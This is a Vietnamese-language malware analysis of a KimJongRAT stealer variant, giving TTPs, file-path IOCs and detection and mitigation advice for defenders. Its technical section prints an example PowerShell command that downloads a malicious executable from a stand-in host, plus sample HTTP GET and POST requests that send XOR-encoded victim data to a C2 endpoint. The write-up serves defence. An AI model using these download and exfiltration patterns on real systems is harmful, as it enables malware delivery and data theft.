Phân Tích Chi Tiết Biến Thể Malware KimJongRAT Stealer và Các Biện Pháp Ứng Phó
Tổng Quan
Một biến thể mới của malware đánh cắp thông tin KimJongRAT đã xuất hiện, sử dụng tệp LNK được vũ khí hóa (weaponized) để triển khai một dropper dựa trên PowerShell. Biến thể này áp dụng các kỹ thuật tinh vi để thực hiện, duy trì và giao tiếp với cơ sở hạ tầng điều khiển và kiểm soát (C2).
TTPs (MITRE ATT&CK IDs)
- Initial Access (Truy cập ban đầu): Malware khai thác tệp LNK được vũ khí hóa để thực thi các tập lệnh PowerShell.
- Execution (Thực thi): Tập lệnh PowerShell tải xuống các tệp độc hại bổ sung từ một dịch vụ CDN.
- Persistence (Bám trụ): Malware lưu trữ các thành phần của nó trong thư mục
%localappdata%\netvà tạo các tệp cụ thể để duy trì sự hiện diện trên hệ thống. - Command and Control (C2 – Điều khiển và kiểm soát): Malware giao tiếp với dịch vụ CDN thông qua các yêu cầu HTTP GET và POST.
- Data Exfiltration (Trích xuất dữ liệu): Thành phần stealer thu thập và mã hóa dữ liệu của nạn nhân, sau đó trích xuất dữ liệu khi phát hiện một tệp cụ thể.
Cơ Sở Hạ Tầng (Infrastructure)
- Dịch vụ CDN: Malware tải các thành phần từ một dịch vụ CDN, đồng thời sử dụng dịch vụ này để giao tiếp C2.
- Đường dẫn tệp (File Paths):
- Thư mục
%localappdata%\net: Nơi lưu trữ các thành phần của malware. - Tệp
%localappdata%\micro.log.zip: Tệp được tạo bởi thành phần stealer, chứa thông tin bị đánh cắp. - Tệp
%localappdata%\net\notepad.log: Thành phần điều phối chính (main orchestrator) được lưu trữ tại đây.
- Thư mục
IOCs (Indicators of Compromise)
Dưới đây là các chỉ báo liên quan đến biến thể KimJongRAT stealer mà các đội SOC và quản trị viên hệ thống có thể sử dụng để phát hiện và ứng phó:
- Tên tệp (File Names):
net64.log: Tệp mã hóa RC4, chứa thành phần stealer.micro.log.zip: Tệp chứa thông tin bị đánh cắp.notepad.log: Thành phần điều phối chính đã được giải mã.main64.log: Thành phần điều phối chính được mã hóa RC4.
- Đường dẫn tệp (File Paths):
%localappdata%\net: Thư mục lưu trữ các thành phần malware.
- Yêu cầu HTTP (HTTP Requests):
- Yêu cầu HTTP GET để tải tệp độc hại từ dịch vụ CDN.
- Yêu cầu HTTP POST để gửi dữ liệu tệp với khóa XOR 0xFE.
Phân Tích Kỹ Thuật
Tập Lệnh PowerShell
Tập lệnh PowerShell dưới đây là một ví dụ minh họa cách malware tải tệp độc hại từ máy chủ từ xa:
# Example of PowerShell script used to download malicious files
Invoke-WebRequest -Uri "https://example.com/malicious_file.exe" -OutFile "C:\path\to\malicious_file.exe"
Yêu Cầu HTTP
Dưới đây là các ví dụ về yêu cầu HTTP mà malware sử dụng để tải tệp và giao tiếp với máy chủ C2:
# Example of HTTP GET request to download malicious file
GET /malicious_file.exe HTTP/1.1
Host: example.com
# Example of HTTP POST request to send file data
POST /c2_endpoint HTTP/1.1
Host: example.com
Key: val, value: delete
Key: id, value: <UniqueVictimID>
Key: file0, value: <XORedFileData> (XOR key is always 0xFE)
Khuyến Nghị Ứng Phó
- Phát hiện (Detection): Theo dõi các tệp LNK đáng ngờ và các tập lệnh PowerShell được thực thi từ các vị trí bất thường.
- Chặn (Blocking): Ngăn chặn truy cập tới dịch vụ CDN được malware sử dụng.
- Theo dõi (Monitoring): Giám sát hoạt động mạng bất thường và sự tạo tệp trong thư mục
%localappdata%\net.
Các Biện Pháp Khắc Phục (Mitigation)
Quản Lý Tệp (File Management)
- Thường xuyên theo dõi thư mục
%localappdata%\netđể phát hiện hoạt động đáng ngờ. - Triển khai công cụ giám sát tính toàn vẹn tệp (file integrity monitoring) để phát hiện các thay đổi trong thư mục này.
Giám Sát Mạng (Network Monitoring)
- Theo dõi các mẫu lưu lượng mạng bất thường, đặc biệt là các yêu cầu HTTP GET và POST tới các dịch vụ CDN.
- Áp dụng phân đoạn mạng (network segmentation) để cô lập giao tiếp C2 tiềm năng.
Bối Cảnh Bổ Sung
Biến thể KimJongRAT stealer là một phần của bối cảnh mối đe dọa rộng lớn hơn, nơi các tác nhân đe dọa sử dụng các kỹ thuật tinh vi để xâm phạm hệ thống. Điều này bao gồm việc khai thác các lỗ hổng trong các hành động của bên thứ ba và sử dụng các họ malware tiên tiến như KimJongRAT.
